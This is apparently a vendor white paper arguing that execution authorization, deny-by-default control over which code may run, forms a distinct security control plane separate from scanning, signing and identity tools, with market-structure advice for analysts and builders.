A distinct control plane — not a feature. The structural case for why authorizing what executes is becoming its own enforcement primitive, written for analysts mapping the space and builders deciding whether to embed or rebuild.
Zero Trust matured deny-by-default enforcement for identity and network. It never produced an equivalent primitive for execution — what code is actually permitted to run. That gap is structural, widening, and unreachable by advisory tooling. The control that closes it is not a feature of any existing product; it is a separate control plane with its own policy object, its own enforcement point, and its own evidence artifact. That is a category.
Categories emerge when forces make a gap both visible and permanent. Five are converging on execution authorization at once.
Across the Zero Trust pillars, Identity and Network have deny-by-default enforcement primitives. The Applications & Workloads pillar has been served mainly by advisory controls — scanning, inventory, posture — with no equivalent primitive for what executes. The asymmetry is doctrinal, not incidental.
Scanning, SBOM, and posture tools declare intent and surface findings. They cannot, by construction, govern the moment of execution. Declared is not executed — and no amount of better detection collapses that distance. The gap is a different control type, not a maturity level of the same one.
In April 2026, the central vulnerability-enrichment pipeline abandoned universal coverage, citing a multi-year submission surge, and moved its backlog to a not-scheduled state. Any defense keyed to that enrichment now has a growing blind spot it cannot see. Enforcement that is independent of known-bad identifiers stops being optional.
Signing and attestation prove who published an artifact and that it is unmodified. Neither authorizes what that artifact does at runtime. Identity is not integrity; signed is not safe. Supply-chain compromise lives precisely in the space those controls leave open.
Containerized, autoscaled, and increasingly agent-driven workloads spin up faster than human-paced triage can review. A control that decides at execution time — deterministically, without waiting on a queue — is the only model that matches the operating tempo.
A control plane is not a marketing label. It earns the name when it owns a decision nothing else owns, enforces at a boundary nothing else enforces, and emits evidence nothing else emits. Execution authorization passes all three.
"What may execute, for this workload, now" — a question no scanner, identity, or network control is structured to answer.
A deny-by-default gate at the execution layer — synchronous, before behavior begins, not a post-hoc response.
A verifiable record of each authorization decision — auditable proof that becomes a compliance primitive in its own right.
Emerging enforcement categories tend to resolve into a predictable shape, and the precedent from the network layer is instructive: an open, portable data-plane standard spreads adoption and becomes eligible for mandate, while durable value concentrates in the proprietary enforcement and control built on top — a structure that consistently ends in incumbent consolidation.
Execution authorization is likely to follow it. The evidence format — the portable record of an authorization decision — wants to be an open standard: vendor-neutral, mandate-eligible, adopted everywhere. The enforcement gate and method — the part that actually decides and cannot be forged — is where the defensible position sits. The two are separable, and treating them as separable is the strategy.
A host-resident signer is forgeable under host compromise. Any evidence model whose trust root lives on the same host it attests cannot survive the threat it exists to address — which is why the enforcement boundary, not the format, is the hard problem worth owning.
Track execution authorization as a distinct control plane, not a sub-bullet of endpoint or supply-chain tooling. It has its own decision, boundary, and evidence artifact — the markers you use to scope coverage. Folding it into an adjacent category understates a gap that doctrine itself leaves open.
The advisory layers are mature and crowded; the enforcing endpoint is not. Embedding an execution-authorization primitive completes a portfolio that today stops at "we detected it." The integration surface is narrow and well-defined — a policy interface in, a verdict and evidence stream out — which is the embed-versus-rebuild calculus worth running.
If execution authorization reads as its own control plane — with a decision, a boundary, and an evidence artifact no adjacent category owns — then the thesis has done its work. Deeper market-structure and integration detail is available to named parties under appropriate terms.